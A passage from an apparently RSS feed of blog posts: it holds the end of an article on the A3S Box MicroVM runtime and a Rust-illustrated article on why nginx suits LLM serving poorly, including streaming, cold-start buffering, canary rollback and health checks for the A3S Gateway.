&lt;p&gt;&lt;strong&gt;OCI image building&lt;/strong&gt;: The &lt;code&gt;a3s-box build&lt;/code&gt; command has been reserved via feature gate, and will support building OCI images inside MicroVMs — meaning the build process itself is protected by hardware isolation, preventing malicious Dockerfiles from attacking the host.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Kubernetes Operator maturation&lt;/strong&gt;: The current &lt;code&gt;BoxAutoscaler&lt;/code&gt; CRD is at the &lt;code&gt;v1alpha1&lt;/code&gt; stage and will progressively evolve to &lt;code&gt;v1beta1&lt;/code&gt; and &lt;code&gt;v1&lt;/code&gt;, adding more automated operations capabilities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Rolling update strategies&lt;/li&gt;
&lt;li&gt;Canary releases&lt;/li&gt;
&lt;li&gt;Automatic failure recovery&lt;/li&gt;
&lt;li&gt;Cross-availability-zone scheduling&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Observability enhancements&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;More granular Prometheus metrics (network I/O, disk I/O, vsock latency)&lt;/li&gt;
&lt;li&gt;Built-in Grafana dashboard templates&lt;/li&gt;
&lt;li&gt;Real-time streaming of audit events (WebSocket / gRPC stream)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  21.3 Performance Optimization Directions
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Startup time optimization&lt;/strong&gt;: Although 200ms cold start is already fast, there is still room for optimization:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Kernel trimming: Remove kernel modules not needed by MicroVMs, reducing kernel boot time&lt;/li&gt;
&lt;li&gt;Snapshot restore: Save initialized VM snapshots, restore from snapshot rather than starting from scratch&lt;/li&gt;
&lt;li&gt;Parallel initialization: Guest Init's steps execute in parallel where possible&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Memory optimization&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;KSM (Kernel Same-page Merging): When multiple MicroVMs run the same image, share identical memory pages&lt;/li&gt;
&lt;li&gt;Memory balloon: Dynamically adjust VM memory allocation, reclaim unused memory&lt;/li&gt;
&lt;li&gt;Lazy memory allocation: Only allocate physical memory pages when the VM actually accesses them&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  21.4 Summary
&lt;/h3&gt;

&lt;p&gt;A3S Box represents a paradigm shift in container runtimes. It doesn't patch existing container technology, but starts from the fundamental question "what is the essence of workload isolation" and arrives at a clear answer:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Every workload should run on its own operating system kernel, with hardware virtualization providing isolation guarantees, confidential computing providing data protection, while maintaining container-level startup speed and developer experience.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The realization of this answer depends on several key technical choices:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;libkrun as VMM&lt;/strong&gt;: Library-form embedding, native macOS/Linux dual-platform support, ~200ms cold start&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rust as implementation language&lt;/strong&gt;: Memory safety, zero-cost abstractions, cross-platform compilation, PyO3/napi-rs ecosystem&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Minimal core + external extensions architecture&lt;/strong&gt;: 5 core components remain stable, 14 extension points can evolve independently&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Seven-layer defense in depth&lt;/strong&gt;: From hardware encryption to syscall filtering, each layer independently increases attack cost&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Docker-compatible user experience&lt;/strong&gt;: 52 commands, zero migration cost&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A3S Box's 1,466 tests (covering 218 source files) ensure the correct implementation of these technical choices. And its modular design — seven crates each with their own responsibilities, loosely coupled through Trait interfaces — ensures the system can continue to evolve without losing control.&lt;/p&gt;

&lt;p&gt;In the AI Agent era, a secure code execution environment is no longer optional but foundational infrastructure. A3S Box is the runtime built for this era — it runs every line of untrusted code in a hardware-isolated sandbox, protects every byte of sensitive data with hardware encryption, while making developers feel like they're using Docker.&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;A3S Box — Making security the default, not the option.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Documentation: &lt;a href="https://a3s-lab.github.io/a3s/" rel="noopener noreferrer"&gt;https://a3s-lab.github.io/a3s/&lt;/a&gt; | GitHub: &lt;a href="https://github.com/A3S-Lab/Box" rel="noopener noreferrer"&gt;https://github.com/A3S-Lab/Box&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>microvm</category>
      <category>tee</category>
    </item>
    <item>
      <title>Your nginx Is Killing Your AI Service — Why You Need to Redesign the Traffic Layer</title>
      <dc:creator>Roy Lin</dc:creator>
      <pubDate>Mon, 23 Feb 2026 18:46:51 +0000</pubDate>
      <link>https://forem.com/roylin/your-nginx-is-killing-your-ai-service-why-you-need-to-redesign-the-traffic-layer-1go2</link>
      <guid>https://forem.com/roylin/your-nginx-is-killing-your-ai-service-why-you-need-to-redesign-the-traffic-layer-1go2</guid>
      <description>&lt;p&gt;Four numbers define the problem this article addresses:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;3 seconds&lt;/strong&gt;: The maximum wait time users can tolerate — churn spikes sharply beyond this threshold.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;47 seconds&lt;/strong&gt;: The median time for a 70B model to complete a full inference pass on an A100.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;0.3 seconds&lt;/strong&gt;: The time for that same model to output its first token.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;$2.48&lt;/strong&gt;: The on-demand price of one A100 GPU per hour. If it sits idle at 3 AM, that money is gone.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The tension between these four numbers is the most fundamental engineering problem in AI infrastructure: &lt;strong&gt;users demand instant responses, models need time to think, compute must be precisely scheduled — and the traditional traffic layer knows nothing about any of this.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;The Life of a Request: What nginx Is Doing&lt;/li&gt;
&lt;li&gt;Fault Line 1: A Response Is Not a Packet, It Is a River&lt;/li&gt;
&lt;li&gt;Fault Line 2: The Backend May Not Exist Yet&lt;/li&gt;
&lt;li&gt;Fault Line 3: You Never Know If the New Model Got Dumber&lt;/li&gt;
&lt;li&gt;Fault Line 4: Connections Are Not Disposable&lt;/li&gt;
&lt;li&gt;Fault Line 5: Inference Fails Differently Than HTTP 500&lt;/li&gt;
&lt;li&gt;Redesigning: What an AI Traffic Layer Needs&lt;/li&gt;
&lt;li&gt;How A3S Gateway Addresses the Five Fault Lines&lt;/li&gt;
&lt;li&gt;A Real Comparison With Existing Solutions&lt;/li&gt;
&lt;li&gt;In Practice: Configuring a Full Proxy for an AI Backend&lt;/li&gt;
&lt;li&gt;Autoscaling: The Principles Behind the Numbers&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  1. The Life of a Request: What nginx Is Doing
&lt;/h2&gt;

&lt;p&gt;Let us start with the most basic question: when a request enters nginx, what is nginx actually doing?&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client  ──→  nginx  ──→  Backend  ──→  nginx  ──→  Client
               ↑                          ↑
       Receives full response       Forwards to client
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The core model of nginx is &lt;strong&gt;proxy buffering&lt;/strong&gt;. Its default behavior is:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Receive the complete response body from upstream&lt;/li&gt;
&lt;li&gt;Cache it to local memory or a temporary file&lt;/li&gt;
&lt;li&gt;Then send the cached content to the client&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This design made perfect sense in 2004. HTTP responses were static files, database query results, template rendering output — they were complete at the moment of generation, and only needed a buffer to handle client network jitter.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;But LLM responses do not work that way.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;An LLM inference server behaves more like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Backend (vLLM / llama.cpp):
  t=0ms:     Receives request, begins inference
  t=300ms:   Generates first token: "Of"
  t=400ms:   Generates second token: "course"
  t=500ms:   Generates third token: ","
  ...
  t=47000ms: Generates last token, inference complete
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If nginx has proxy buffering enabled (the default), what the user sees is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User side:
  t=0ms:     Sends request
  t=47300ms: Receives all 4096 tokens at once
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;47 seconds of blank screen. Then text cascades down all at once.&lt;/p&gt;

&lt;p&gt;The user has already closed the tab.&lt;/p&gt;

&lt;p&gt;nginx does provide a way to disable buffering: &lt;code&gt;proxy_buffering off&lt;/code&gt;. But that is just the beginning — when you actually run AI services in production, you will find this is the easiest of the five fault lines to solve.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. Fault Line 1: A Response Is Not a Packet, It Is a River
&lt;/h2&gt;

&lt;p&gt;After turning off proxy buffering, streaming appears to be solved. But the word "streaming" hides a lot of detail.&lt;/p&gt;

&lt;p&gt;SSE (Server-Sent Events) is the standard protocol for LLM streaming output. A well-formed SSE stream looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;data: {"id":"chatcmpl-xxx","choices":[{"delta":{"content":"Of"},"index":0}]}

data: {"id":"chatcmpl-xxx","choices":[{"delta":{"content":" course"},"index":0}]}

data: [DONE]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each line is an event, separated by two newlines. The problem is: TCP does not guarantee packet boundaries. Under high concurrency, the network stack may merge multiple SSE events into one TCP packet, or split one event across multiple packets.&lt;/p&gt;

&lt;p&gt;What an nginx with "proxy buffering off" does is: forward the bytes received from upstream as-is. This works in most cases, but:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Connection keepalive&lt;/strong&gt;: nginx needs to know when one response ends and the next begins. For regular HTTP, this is controlled by &lt;code&gt;Content-Length&lt;/code&gt; or &lt;code&gt;Transfer-Encoding: chunked&lt;/code&gt;. For SSE, the connection stays open for the entire conversation — nginx's default timeouts may cut the connection while the model is still thinking.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Degradation under memory pressure&lt;/strong&gt;: When nginx's memory pool fills up (say, 500 concurrent streaming requests), it silently re-enables buffering. Your monitoring sees normal 200 responses; users see latency suddenly spike.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Unpredictable response size&lt;/strong&gt;: nginx's &lt;code&gt;proxy_max_temp_file_size&lt;/code&gt; has a default upper limit. A full token stream from a long conversation may exceed it.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;True zero-buffer streaming requires treating streams as a first-class citizen at the design level of the entire proxy layer — not patching a Web proxy after the fact.&lt;/p&gt;

&lt;p&gt;From an implementation perspective, the difference is very concrete:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Zero-buffer SSE forwarding: forward whatever arrives, no accumulation&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;forward_streaming&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;upstream&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Response&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;Incoming&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;sender&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;ResponseSender&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;chunk&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;upstream&lt;/span&gt;&lt;span class="nf"&gt;.body_mut&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="nf"&gt;.frame&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="nf"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;frame&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;chunk&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// Each frame is sent immediately, without waiting for the next&lt;/span&gt;
            &lt;span class="n"&gt;sender&lt;/span&gt;&lt;span class="nf"&gt;.send_data&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;frame&lt;/span&gt;&lt;span class="nf"&gt;.into_data&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="nf"&gt;.unwrap&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="nf"&gt;.ok&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Contrast this with a buffered proxy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Buffered proxy: wait for everything before sending&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;body_bytes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;hyper&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nn"&gt;body&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;to_bytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;upstream&lt;/span&gt;&lt;span class="nf"&gt;.body_mut&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="c1"&gt;// The user waits here for the entire inference duration&lt;/span&gt;
&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="nf"&gt;.body&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;body_bytes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is an architectural choice, not a configuration option.&lt;/p&gt;




&lt;h2&gt;
  
  
  3. Fault Line 2: The Backend May Not Exist Yet
&lt;/h2&gt;

&lt;p&gt;At 3 AM, no users are accessing your LLM service. Kubernetes HPA scales the GPU instances down to zero — because keeping one A100 on standby all day costs roughly $1,800 extra per month.&lt;/p&gt;

&lt;p&gt;At 9 AM, the first user opens a chat window, types a message, and hits send.&lt;/p&gt;

&lt;p&gt;When this request reaches the gateway, how many healthy backend instances are there? &lt;strong&gt;Zero.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;What does nginx return? &lt;code&gt;502 Bad Gateway&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;What does the user do? Refresh, try again, another 502. If it is an internal enterprise tool, they go to Slack and ask "is the service down?" If it is a consumer product, they have probably already left.&lt;/p&gt;

&lt;p&gt;The root cause is not in the Kubernetes configuration or the HPA policy — it is in how the gateway handles the fact that the backend does not exist.&lt;/p&gt;

&lt;p&gt;The mental model of a traditional gateway is: &lt;strong&gt;the backend is always there&lt;/strong&gt;. The gateway is a traffic mover, not a scheduling center. When the backend is absent, the only option is to error.&lt;/p&gt;

&lt;p&gt;AI services need a different mental model: &lt;strong&gt;requests can wait&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Not indefinitely — you need a reasonable timeout and queue depth. But during model startup (typically 30–60 seconds), requests should queue in memory rather than be dropped immediately. This pattern is called &lt;strong&gt;cold-start buffering&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User request (09:00:00)
    ↓
Gateway: detects zero backends → triggers scale-up → request enters memory queue
    ↓
Kubernetes brings up GPU instance (09:00:45)
    ↓
Instance passes health check (09:01:00)
    ↓
Gateway dequeues request → sends to backend → user receives first token at 09:01:03
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The user experiences 63 seconds of "thinking", not a 502 error. That is a world of difference in user experience.&lt;/p&gt;

&lt;p&gt;This capability requires the gateway to be aware of the autoscaling system — it must know when to trigger scale-up, when the backend is ready, and how to replay queued requests. These are things nginx was never designed to handle.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Fault Line 3: You Never Know If the New Model Got Dumber
&lt;/h2&gt;

&lt;p&gt;Software deployment has one saving grace: &lt;strong&gt;code is static and can be fully tested&lt;/strong&gt;. You run unit tests, integration tests, and end-to-end tests in CI. If they all pass, you have reason to believe the deployment is safe.&lt;/p&gt;

&lt;p&gt;Models do not have this saving grace.&lt;/p&gt;

&lt;p&gt;You can have an eval suite that validates accuracy improved from 87% to 89% across 1,000 questions. But real user questions follow a long-tail distribution — how much of that tail does your eval cover? When users ask questions in their own language and their own context, what does the new model do?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No static test can answer this question.&lt;/strong&gt; The only answer lives in real traffic.&lt;/p&gt;

&lt;p&gt;This is why AI teams need &lt;strong&gt;canary releases&lt;/strong&gt; — not the blue-green deployments of Web development where new and old code run the same logic, but genuinely routing a fraction of real user requests to the new model and observing its behavior in the wild.&lt;/p&gt;

&lt;p&gt;But canary releases are dangerous on their own, unless paired with &lt;strong&gt;automatic rollback&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Deploying v2 (new model):
  Minute 1: v1 gets 98% traffic, v2 gets 2%
    → v2 error rate: 0.8% (normal), latency: 1.2s (normal)
  Minute 2: v1 gets 90%, v2 gets 10%
    → v2 error rate: 1.1% (normal), latency: 1.3s (normal)
  Minute 3: v1 gets 80%, v2 gets 20%
    → v2 error rate: 8.7% ← exceeds threshold of 5%
    → Auto-rollback: v1 gets 100% traffic, v2 taken offline
    → Alert sent to on-call
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This capability requires the gateway to do version-aware traffic splitting, metric aggregation, and threshold evaluation at the traffic layer — something that can never be implemented with nginx config files.&lt;/p&gt;

&lt;p&gt;There is also an earlier validation technique: &lt;strong&gt;traffic mirroring&lt;/strong&gt;. Before routing any traffic to the new model, copy 5% of real requests and send them to it, but only return the primary model's response to users. The new model's responses are discarded, but you can log them for offline analysis — how does it perform on real traffic? Where does it diverge from the primary model?&lt;/p&gt;

&lt;p&gt;This is the only way to validate new model quality under "zero-risk" conditions.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. Fault Line 4: Connections Are Not Disposable
&lt;/h2&gt;

&lt;p&gt;The lifecycle of a traditional HTTP API:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client sends request → Server processes → Returns response → Connection closes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each request is independent. Connections are short-lived. The gateway is a stateless router.&lt;/p&gt;

&lt;p&gt;AI application connections take different forms:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Conversational AI&lt;/strong&gt;: A conversation between a user and a model can last tens of minutes. If implemented over HTTP, each turn is an independent request — that is fine. But if using WebSocket — because you need bidirectional push, such as letting users send a "stop" command while the model is still generating — the gateway needs to maintain the state of this long-lived connection, not treat it as a plain TCP stream after the handshake.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Streaming Agents&lt;/strong&gt;: An AI agent may continuously push progress updates to the client while executing a task. This is not request-response; it is an event stream that lasts minutes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real-time Voice&lt;/strong&gt;: Voice AI requires bidirectional low-latency streams — upstream audio while the user speaks, downstream audio as the model outputs. This is WebSocket or QUIC, not HTTP.&lt;/p&gt;

&lt;p&gt;Traditional gateways treat WebSocket as a special case that needs to be "supported". But in AI applications, persistent connections are the norm, and short request-response cycles are the exception.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Fault Line 5: Inference Fails Differently Than HTTP 500
&lt;/h2&gt;

&lt;p&gt;A Web API fails typically because:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The database went down&lt;/li&gt;
&lt;li&gt;Code threw an exception&lt;/li&gt;
&lt;li&gt;A dependency service timed out&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These failures are &lt;strong&gt;fast&lt;/strong&gt;: requests fail within milliseconds, and the gateway's timeout and retry policies can handle them.&lt;/p&gt;

&lt;p&gt;AI inference failure modes are completely different:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Out-of-memory (OOM)&lt;/strong&gt;: The model exhausts GPU memory while processing an especially long context. The request does not fail immediately — it may first slow down (GPU starts swapping), then return an empty response or 500 after 30 seconds.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output degeneration&lt;/strong&gt;: The model starts generating gibberish or infinitely repeating content. From an HTTP perspective, this is a successful 200 response — but it is harmful.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Inference timeout&lt;/strong&gt;: A complex inference request may legitimately take 2 minutes, but sometimes gets stuck in a loop and never finishes. The gateway's timeout needs to distinguish between "normally slow requests" and "stuck requests".&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This means the gateway's health judgment cannot rely solely on HTTP status codes. &lt;strong&gt;Passive health checks&lt;/strong&gt; (judging backend health based on the actual success rate of real requests) reflect the true state of AI backends better than active &lt;code&gt;/health&lt;/code&gt; probes.&lt;/p&gt;

&lt;p&gt;When a backend starts frequently experiencing OOM or timeouts, the gateway needs to automatically reduce traffic sent to that instance, or even temporarily remove it from the load balancing pool — not waiting for a health check to fail, but based on real-time error rates and latency.&lt;/p&gt;




&lt;h2&gt;
  
  
  7. Redesigning: What an AI Traffic Layer Needs
&lt;/h2&gt;

&lt;p&gt;Putting the five fault lines together, an AI-native gateway needs to address these five things by design:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Zero-buffer streaming&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Not "supporting SSE", but treating streams as a first-class citizen at the memory model level. Every byte is forwarded the instant it arrives from upstream, without passing through any local buffer. This requires the proxy layer's underlying implementation to use async I/O and zero-copy forwarding.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cold-start request buffering&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The gateway must know the current replica count of the backend, trigger scale-up when replicas are zero, and place requests in a memory queue. When replicas are ready, queued requests must be replayed in the correct order, carrying the original timeout deadline (a request that has already waited 30 seconds should not get a full inference timeout on top of that).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Version-aware traffic splitting with automatic rollback&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The gateway needs to maintain independent metrics per backend version (error rate, latency percentiles), and decide whether to advance, pause, or roll back based on configured thresholds. This decision loop must close inside the gateway, without depending on external system coordination.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Persistent connections as first-class citizens&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;WebSocket handshakes, protocol upgrades, bidirectional stream forwarding — these must use the same efficient code paths as HTTP proxying, not be hacked onto the back of an HTTP proxy.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Passive health management based on real-time behavior&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Active probes plus passive error rate tracking — both are required. When an instance's error rate exceeds a threshold over the past 60 seconds, it should be temporarily removed from the load balancing pool until the error rate recovers.&lt;/p&gt;




&lt;h2&gt;
  
  
  8. How A3S Gateway Addresses the Five Fault Lines
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Zero-Buffer SSE Forwarding
&lt;/h3&gt;

&lt;p&gt;A3S Gateway uses a dedicated streaming client for streaming requests, based on &lt;code&gt;reqwest&lt;/code&gt;'s streaming response interface, with &lt;code&gt;tcp_nodelay&lt;/code&gt; and a 90-second connection pool keepalive:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// When an SSE/streaming request is detected, switch to the zero-buffer path&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;is_sse&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;is_streaming_request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="nf"&gt;.headers&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;is_sse&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// streaming_client does not accumulate the response body&lt;/span&gt;
    &lt;span class="c1"&gt;// each chunk is forwarded as it arrives from upstream&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;stream_response&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;streaming_client&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;backend&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every token travels from model output to client receipt with no buffering layer in between.&lt;/p&gt;

&lt;h3&gt;
  
  
  Cold-Start Request Buffering
&lt;/h3&gt;

&lt;p&gt;When &lt;code&gt;min_replicas = 0&lt;/code&gt;, the gateway places requests in a bounded queue (&lt;code&gt;RequestBuffer&lt;/code&gt;) when replicas are zero, triggers scale-up, waits for replicas to pass health checks, then replays requests:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;services&lt;/span&gt; &lt;span class="s2"&gt;"llm-backend"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;scaling&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;min_replicas&lt;/span&gt;          &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;      &lt;span class="c1"&gt;# allow scale-to-zero&lt;/span&gt;
    &lt;span class="nx"&gt;max_replicas&lt;/span&gt;          &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;
    &lt;span class="nx"&gt;container_concurrency&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;     &lt;span class="c1"&gt;# max 10 concurrent requests per replica&lt;/span&gt;
    &lt;span class="nx"&gt;buffer_enabled&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# enable cold-start buffering&lt;/span&gt;
    &lt;span class="nx"&gt;executor&lt;/span&gt;              &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"box"&lt;/span&gt;  &lt;span class="c1"&gt;# use A3S Box to manage replicas&lt;/span&gt;
